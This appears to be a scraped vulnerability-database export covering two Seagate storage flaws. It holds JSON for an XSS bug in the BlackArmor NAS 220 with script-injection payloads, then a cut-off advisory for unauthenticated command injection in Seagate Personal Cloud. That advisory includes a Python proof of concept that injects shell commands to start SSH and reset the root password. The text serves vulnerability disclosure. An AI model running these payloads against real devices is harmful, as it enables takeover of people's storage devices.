"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201401-0161",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 2.4,
"vendor": "seagate",
"version": "sg2000-2000.1331"
},
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 1.8,
"vendor": "seagate",
"version": "st320005lsa10g-rk"
},
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 1.8,
"vendor": "seagate",
"version": "st340005lsa10g-rk"
},
{
"model": "blackarmor nas 220",
"scope": "eq",
"trust": 1.8,
"vendor": "seagate",
"version": "stav6000100"
},
{
"model": "technology llc blackarmor nas sg2000-2000.1331",
"scope": "eq",
"trust": 0.6,
"vendor": "seagate",
"version": "220"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00094"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001028"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-126"
},
{
"db": "NVD",
"id": "CVE-2013-6923"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:seagate:blackarmor_nas_220",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:seagate:blackarmor_nas_220_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001028"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jeroen - IT Nerdbox",
"sources": [
{
"db": "BID",
"id": "64655"
}
],
"trust": 0.3
},
"cve": "CVE-2013-6923",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2013-6923",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2014-00094",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-66925",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-6923",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2013-6923",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2014-00094",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201401-126",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-66925",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00094"
},
{
"db": "VULHUB",
"id": "VHN-66925"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001028"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-126"
},
{
"db": "NVD",
"id": "CVE-2013-6923"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple cross-site scripting (XSS) vulnerabilities in Seagate BlackArmor NAS 220 devices with firmware sg2000-2000.1331 allow remote attackers to inject arbitrary web script or HTML via the (1) fullname parameter to admin/access_control_user_edit.php or (2) workname parameter to admin/network_workgroup_domain.php. The Seagate BlackArmor NAS is a network storage device. The workgroup configuration is subject to a persistent cross-site scripting attack. When a user is added to the device, the application does not properly filter the user name field data, allowing the attacker to exploit the vulnerability to inject malicious scripts or HTML code. BlackArmor NAS 220 storage server is prone to the following remote security vulnerabilities:\n1. Multiple cross-site request forgery vulnerabilities\n2. Multiple HTML-injection vulnerabilities\n3. An arbitrary code-execution vulnerability\nAttackers can exploit these issues to perform certain unauthorized actions, execute HTML and script code and steal cookie-based authentication credentials and execute arbitrary code. Other attacks are possible. \nBlackArmor NAS 220 running firmware sg2000-2000.1331 is vulnerable; other versions may also be affected. It can provide layered protection, data increment and system backup and recovery for business-critical data. The vulnerability is caused by the admin/access_control_user_edit.php script not adequately filtering the \u0027fullname\u0027 parameter and the admin/network_workgroup_domain.php script not properly filtering the \u0027workname\u0027 parameter . # Exploit Title: Seagate BlackArmor NAS - Multiple Persistent Cross Site\nScripting Vulnerabilities\n \n# Google Dork: N/A\n \n# Date: 04-01-2014\n \n# Exploit Author: Jeroen - IT Nerdbox\n \n# Vendor Homepage: \u003chttp://www.seagate.com/\u003e http://www.seagate.com/\n \n# Software Link:\n\u003chttp://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/\n\u003e\nhttp://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/\n \n# Version: sg2000-2000.1331\n \n# Tested on: N/A\n \n# CVE : CVE-2013-6923\n \n#\n \n## Description:\n \n#\n \n# When adding a user to the device, it is possible to enter a full name. \nThis input field does not\n \n# sanitize its input and it is possible to enter any payload which will get\nexecuted upon reload. The Work\nGroup name input\n# field does not sanitize its input. \n \n#\n# This vulnerability was reported to Seagate in September 2013, they stated\nthat this will not be fixed. \n \n#\n \n## Proof of Concept #1:\n \n#\n \n# POST: http(s)://\u003curl | ip\u003e/admin/access_control_user_edit.php?id=2\u0026lang=en\n# Parameters:\n \n#\n \n# index = 2\n# fullname = \u003cscript\u003ealert(1);\u003c/script\u003e\n# submit = Submit\n \n#\n \n#\n \n## Proof of Concept #2:\n \n#\n \n# POST: http(s)://\u003curl |\nip\u003e/admin/network_workgroup_domain.php?lang=en\u0026gi=n003\n \n# Parameter:\n \n#\n \n# workname = \"\u003e\u003cinput onmouseover=prompt(1) \u003e\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6923"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001028"
},
{
"db": "CNVD",
"id": "CNVD-2014-00094"
},
{
"db": "BID",
"id": "64655"
},
{
"db": "VULHUB",
"id": "VHN-66925"
},
{
"db": "PACKETSTORM",
"id": "124685"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-66925",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66925"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6923",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "124685",
"trust": 2.6
},
{
"db": "EXPLOIT-DB",
"id": "30727",
"trust": 2.3
},
{
"db": "XF",
"id": "90111",
"trust": 1.4
},
{
"db": "BID",
"id": "64655",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001028",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201401-126",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00094",
"trust": 0.6
},
{
"db": "XF",
"id": "20136923",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-84094",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-66925",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00094"
},
{
"db": "VULHUB",
"id": "VHN-66925"
},
{
"db": "BID",
"id": "64655"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001028"
},
{
"db": "PACKETSTORM",
"id": "124685"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-126"
},
{
"db": "NVD",
"id": "CVE-2013-6923"
}
]
},
"id": "VAR-201401-0161",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00094"
},
{
"db": "VULHUB",
"id": "VHN-66925"
}
],
"trust": 1.54343433
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00094"
}
]
},
"last_update_date": "2025-04-11T22:48:24.323000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "BlackArmor NAS 220",
"trust": 0.8,
"url": "http://www.seagate.com/jp/ja/external-hard-drives/network-storage/business/blackarmor-nas-220/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001028"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-66925"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001028"
},
{
"db": "NVD",
"id": "CVE-2013-6923"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "http://packetstormsecurity.com/files/124685"
},
{
"trust": 1.7,
"url": "http://www.exploit-db.com/exploits/30727"
},
{
"trust": 1.4,
"url": "http://xforce.iss.net/xforce/xfdb/90111"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/90111"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6923"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6923"
},
{
"trust": 0.6,
"url": "http://www.exploit-db.com/exploits/30727/"
},
{
"trust": 0.1,
"url": "http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/"
},
{
"trust": 0.1,
"url": "http://www.seagate.com/\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-6923"
},
{
"trust": 0.1,
"url": "http://www.seagate.com/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00094"
},
{
"db": "VULHUB",
"id": "VHN-66925"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001028"
},
{
"db": "PACKETSTORM",
"id": "124685"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-126"
},
{
"db": "NVD",
"id": "CVE-2013-6923"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00094"
},
{
"db": "VULHUB",
"id": "VHN-66925"
},
{
"db": "BID",
"id": "64655"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-001028"
},
{
"db": "PACKETSTORM",
"id": "124685"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-126"
},
{
"db": "NVD",
"id": "CVE-2013-6923"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00094"
},
{
"date": "2014-01-09T00:00:00",
"db": "VULHUB",
"id": "VHN-66925"
},
{
"date": "2014-01-06T00:00:00",
"db": "BID",
"id": "64655"
},
{
"date": "2014-01-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001028"
},
{
"date": "2014-01-06T13:02:22",
"db": "PACKETSTORM",
"id": "124685"
},
{
"date": "2014-01-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-126"
},
{
"date": "2014-01-09T18:55:08.150000",
"db": "NVD",
"id": "CVE-2013-6923"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00094"
},
{
"date": "2017-08-29T00:00:00",
"db": "VULHUB",
"id": "VHN-66925"
},
{
"date": "2015-03-19T09:05:00",
"db": "BID",
"id": "64655"
},
{
"date": "2014-01-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-001028"
},
{
"date": "2014-01-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201401-126"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-6923"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201401-126"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Seagate BlackArmor NAS 220 Cross-site scripting vulnerability in device firmware",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-001028"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "124685"
},
{
"db": "CNNVD",
"id": "CNNVD-201401-126"
}
],
"trust": 0.7
}
}
VAR-201801-1503
Vulnerability from variot - Updated: 2024-11-23 22:52Seagate Media Server in Seagate Personal Cloud has unauthenticated command injection in the uploadTelemetry and getLogs functions in views.py because .psp URLs are handled by the fastcgi.server component and shell metacharacters are mishandled. SeagatePersonalCloud is a personal cloud storage device from Seagate, USA. SeagateMediaServer is one of the media servers. An attacker could exploit this vulnerability to execute arbitrary commands with root privileges.
Seagate Personal Cloud Home Media Storage is athe easiest way to store, organize, stream and share all your music, movies, photos, and important documents.a
Credit
An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program
Vendor response
Seagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory
Vulnerabilities details
Seagate Media Server uses Django web framework and is mapped to the .psp extension.
Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol. /etc/lighttpd/conf.d/django-host.conf:
fastcgi.server += (
".psp"=>
((
"socket" => "/var/run/manage_py-fastcgi.socket",
"check-local" => "disable",
"stream-post" => "enable",
"allow-x-send-file" => "enable",
)),
".psp/"=>
((
"socket" => "/var/run/manage_py-fastcgi.socket",
"check-local" => "disable",
"stream-post" => "enable",
"allow-x-send-file" => "enable",
))
)
URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py.
Two views were found to be affected by unauthenticated command injection.
The affected views are:
- uploadTelemetry
- getLogs
These views takes user input from GET parameters and pass these unvalidated/unsanitized to methods of the commands Python module.
/usr/lib/django_host/seagate_media_server/views.py:
@csrf_exempt
def uploadTelemetry(request):
ts = request.GET.get('TimeStamp','')
if (checkDBSQLite()) :
response = '{"stat":"failed","code":"80","message":"The Database has not been initialized or mounted yet!"}'
else :
if ts == "":
response = '{"stat":"failed","code":"380","message":"TimeStamp parameter missing"}'
return HttpResponse(response);
cmd = "/usr/local/bin/log_telemetry "+str(ts)
commands.getoutput(cmd)
return HttpResponse('{"stat":"ok"}')
/usr/lib/django_host/seagate_media_server/views.py:
@csrf_exempt
def getLogs (request):
try:
cmd_base='/usr/bin/log-extract-manager.sh'
uID = request.GET.get ( 'arch_id', None )
time_stamp = request.GET.get ( 'time_stamp', '' )
if uID:
(status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID);
if ('In progress' in output) and (uID in output) :
return HttpResponse ('{"stat":"ok", "data": {"status":"In Progress"}}')
elif (status == 0) :
return HttpResponse ('{"stat":"ok", "data": {"url":"%s", "fileSize":"%d"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) ))
else :
return HttpResponse ('{"stat":"failed", "code":"853","message":"Id not recognized."}' )
else:
(status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp);
if (status == 0) :
return HttpResponse ('{"stat":"ok", "data": {"archiveID":"%s"}}' % (output))
return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
except :
return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
Note that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery.
Proof of Concept
The following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password.
#!/usr/bin/env python
import os
import urllib
scheme = 'http'
host = 'personalcloud.local'
port = '80'
path = 'uploadTelemetry.psp'
querystr = 'TimeStamp=%3b'
#path = 'getLogs.psp'
#querystr = 'time_stamp=%3b'
password = 'Welcome01'
cmds = ['ngc --start sshd 2>&1',
'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}]
for cmd in cmds:
print 'Running command', repr(cmd)
cmd = urllib.quote_plus(cmd)
r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd))
print r.read()
print 'Log in with', password
os.system('ssh -p 2222 root@%s' % host)
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "personal cloud",
"scope": "eq",
"trust": 1.0,
"vendor": "seagate",
"version": null
},
{
"_id": null,
"model": "personal cloud",
"scope": null,
"trust": 0.8,
"vendor": "seagate",
"version": null
},
{
"_id": null,
"model": "technology personal cloud",
"scope": null,
"trust": 0.6,
"vendor": "seagate",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04347"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001653"
},
{
"db": "NVD",
"id": "CVE-2018-5347"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:seagate:personal_cloud_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001653"
}
]
},
"credits": {
"_id": null,
"data": "Yorick Koster",
"sources": [
{
"db": "PACKETSTORM",
"id": "145932"
}
],
"trust": 0.1
},
"cve": "CVE-2018-5347",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2018-5347",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-04347",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-135378",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-5347",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-5347",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-5347",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2018-04347",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201801-562",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-135378",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-5347",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-04347"
},
{
"db": "VULHUB",
"id": "VHN-135378"
},
{
"db": "VULMON",
"id": "CVE-2018-5347"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-001653"
},
{
"db": "CNNVD",
"id": "CNNVD-201801-562"
},
{
"db": "NVD",
"id": "CVE-2018-5347"
}
]
},
"description": {
"_id": null,
"data": "Seagate Media Server in Seagate Personal Cloud has unauthenticated command injection in the uploadTelemetry and getLogs functions in views.py because .psp URLs are handled by the fastcgi.server component and shell metacharacters are mishandled. SeagatePersonalCloud is a personal cloud storage device from Seagate, USA. SeagateMediaServer is one of the media servers. An attacker could exploit this vulnerability to execute arbitrary commands with root privileges. \n \nSeagate Personal Cloud Home Media Storage is athe easiest way to store, organize, stream and share all your music, movies, photos, and important documents.a\n \n## Credit\nAn independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Securityas SecuriTeam Secure Disclosure program\n \n## Vendor response\nSeagate was informed of the vulnerability on October 16, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory\n \n## Vulnerabilities details\nSeagate Media Server uses Django web framework and is mapped to the .psp extension. \n \nAny URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol. \n/etc/lighttpd/conf.d/django-host.conf:\n \n \n```\nfastcgi.server += (\n\".psp\"=\u003e\n ((\n \"socket\" =\u003e \"/var/run/manage_py-fastcgi.socket\",\n \"check-local\" =\u003e \"disable\",\n \"stream-post\" =\u003e \"enable\",\n \"allow-x-send-file\" =\u003e \"enable\",\n )),\n\".psp/\"=\u003e\n ((\n \"socket\" =\u003e \"/var/run/manage_py-fastcgi.socket\",\n \"check-local\" =\u003e \"disable\",\n \"stream-post\" =\u003e \"enable\",\n \"allow-x-send-file\" =\u003e \"enable\",\n ))\n)\n```\n \n \nURLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py. \n \nTwo views were found to be affected by unauthenticated command injection. \n \nThe affected views are:\n \n- uploadTelemetry\n- getLogs\n \nThese views takes user input from GET parameters and pass these unvalidated/unsanitized to methods of the commands Python module. \n \n/usr/lib/django_host/seagate_media_server/views.py:\n \n \n```\n@csrf_exempt\ndef uploadTelemetry(request):\n ts = request.GET.get(\u0027TimeStamp\u0027,\u0027\u0027)\n if (checkDBSQLite()) :\n response = \u0027{\"stat\":\"failed\",\"code\":\"80\",\"message\":\"The Database has not been initialized or mounted yet!\"}\u0027\n else :\n if ts == \"\":\n response = \u0027{\"stat\":\"failed\",\"code\":\"380\",\"message\":\"TimeStamp parameter missing\"}\u0027\n return HttpResponse(response);\n cmd = \"/usr/local/bin/log_telemetry \"+str(ts)\n commands.getoutput(cmd)\n return HttpResponse(\u0027{\"stat\":\"ok\"}\u0027)\n```\n \n \n/usr/lib/django_host/seagate_media_server/views.py:\n \n \n```\n@csrf_exempt\ndef getLogs (request):\n try:\n cmd_base=\u0027/usr/bin/log-extract-manager.sh\u0027\n uID = request.GET.get ( \u0027arch_id\u0027, None )\n time_stamp = request.GET.get ( \u0027time_stamp\u0027, \u0027\u0027 )\n \n if uID:\n (status, output) = commands.getstatusoutput(cmd_base + \u0027 status \u0027 + uID);\n if (\u0027In progress\u0027 in output) and (uID in output) :\n return HttpResponse (\u0027{\"stat\":\"ok\", \"data\": {\"status\":\"In Progress\"}}\u0027)\n elif (status == 0) :\n return HttpResponse (\u0027{\"stat\":\"ok\", \"data\": {\"url\":\"%s\", \"fileSize\":\"%d\"}}\u0027 % ( urllib.quote(output.encode(\u0027utf-8\u0027)), os.path.getsize(output) ))\n else :\n return HttpResponse (\u0027{\"stat\":\"failed\", \"code\":\"853\",\"message\":\"Id not recognized.\"}\u0027 )\n else:\n (status, output) = commands.getstatusoutput(cmd_base + \u0027 start \u0027 + time_stamp);\n if (status == 0) :\n return HttpResponse (\u0027{\"stat\":\"ok\", \"data\": {\"archiveID\":\"%s\"}}\u0027 % (output))\n \n return HttpResponse (\u0027{\"stat\":\"failed\", \"code\":\"852\",\"message\":\"Zip file not created.\"}\u0027 )\n except :\n return HttpResponse (\u0027{\"stat\":\"failed\", \"code\":\"852\",\"message\":\"Zip file not created.\"}\u0027 )\n```\n \n \nNote that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery. \n \n### Proof of Concept\nThe following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password. \n \n \n```\n#!/usr/bin/env python\nimport os\nimport urllib\n \nscheme = \u0027http\u0027\nhost = \u0027personalcloud.local\u0027\nport = \u002780\u0027\npath = \u0027uploadTelemetry.psp\u0027\nquerystr = \u0027TimeStamp=%3b\u0027\n#path = \u0027getLogs.psp\u0027\n#querystr = \u0027time_stamp=%3b\u0027\npassword = \u0027Welcome01\u0027\n \ncmds = [\u0027ngc --start sshd 2\u003e\u00261\u0027,\n \u0027echo -e \"%(s)s\\n%(s)s\"|passwd 2\u003e\u00261\u0027 % {\u0027s\u0027 : password}]\n \nfor cmd in cmds:\n print \u0027Running command\u0027, repr(cmd)\n cmd = urllib.quote_plus(cmd)\n r = urllib.urlopen(\u0027%s://%s:%s/%s?%s%s\u0027 % (scheme, host, port, path, querystr, cmd))\n print r.read()\n \nprint \u0027Log in with\u0027, password\nos.system(\u0027ssh -p 2222 root@%s\u0027 % host)\n```\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-5347"
},
